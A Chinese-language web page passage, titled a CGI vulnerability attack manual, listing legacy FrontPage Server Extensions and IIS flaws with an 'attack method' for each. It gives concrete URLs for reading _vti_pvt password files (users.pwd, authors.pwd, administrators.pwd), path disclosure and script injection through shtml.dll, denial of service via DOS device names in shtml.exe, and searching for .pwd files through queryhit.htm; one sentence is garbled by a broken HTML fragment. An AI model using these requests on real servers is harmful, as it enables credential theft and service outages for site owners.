CGI漏洞攻击手册

那浏览器就会显示出对方的密码文件。

____________________________________________________________________________________
8．users.pwd
UNix系统的http://www.hostname.com/_vti_pvt/users.pwd可读,将暴露用户密码信息。
攻击方法：
访问http://www.hostname.com/_vti_pvt/users.pwd。

____________________________________________________________________________________
9．authors.pwd
UNix系统的http://www.hostname.com/_vti_pvt/authors.pwd可读,将暴露用户密码信息。
攻击方法：
访问http://www.hostname.com/_vti_pvt/authors.pwd。
____________________________________________________________________________________
10．administrators.pwd
UNix系统的http://www.hostname.com/_vti_pvt/administrators.pwd可读,将暴露用户密码信息。
攻击方法：
访问http://www.hostname.com/_vti_pvt/administrators.pwd。

____________________________________________________________________________________
11．shtml.dll
在Frontpage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息. 但是如果我们请求并非HTML、SHTML或者ASP后缀的文件，我们将会得到不同的信息. Hostile Code Here">http://TrustedServer如果用户点击上述指定的链接，脚本将通过HTTP请求从客户端传送给可信任的站点，可信任站点然后将该脚本作为错误信息的一部分返回给客户端。客户端在收到包含该脚本的出错页面时，将执行该脚本，并将赋予来自可信任站点的内容的所有权力赋予该脚本。另外，shtml.dll对较长的带html后缀的文件名都会进行识别和处理，利用这一点，可以对IIS服务器执行DOS攻击，以下这个程序，能使目标服务器的CPU占用率达到 100%，并且耗用所有的应用程序日志空间。系统在数分钟内会报告应用程序日志已满。
攻击方法：
1. 暴露路径：http://www.victim.com/_vti_bin/shtml.dll/something.html ;
这样将返回以下信息：
Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.
2. 可信任站点执行脚本：使用如下格式的URL： http://iis5server/_vti_bin/shtml.dll/alert('document.domain='+document.domain)
____________________________________________________________________________________
12．shtml.exe
微软的 FrontPage Server Extensions存在一个远程拒绝服务漏洞，可能远程关闭一个web站点上的所有FrontPage操作。通过提交一个包含DOS设备名的链接， FrontPage Server Extensions就会挂起，不再响应后续的请求。为了恢复正常工作，必须重新启动IIS或者重新启动机器。
攻击方法：
提交这样的链接，都可能使FrontPage Server Extensions停止响应： http://www.example.com/_vti_bin/shtml.exe/com1.htm ;http://www.example.com/_vti_bin/shtml.exe/prn.htm ;http://www.example.com/_vti_bin/shtml.exe/aux.htm ;http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm ;http://www.example.com/_vti_bin/shtml.exe/com1.asp ;http://www.example.com/_vti_bin/shtml.exe/com1. ;
____________________________________________________________________________________
13.queryhit.htm
如果queryhit.htm提出一个搜索页面，那么你便可以搜索和观看这些文件。
攻击方法：
访问http://www.victim.com/samples/search/queryhit.htm ;如果是搜索页面，然后在查找文件对话框里输入以下字符串：[#filename=*.pwd],如果屏幕上出现一长串连接到以[.pwd]为扩展名的密码文件的话，那就是所需要的东东了。
___________________________

共3页  1 2 3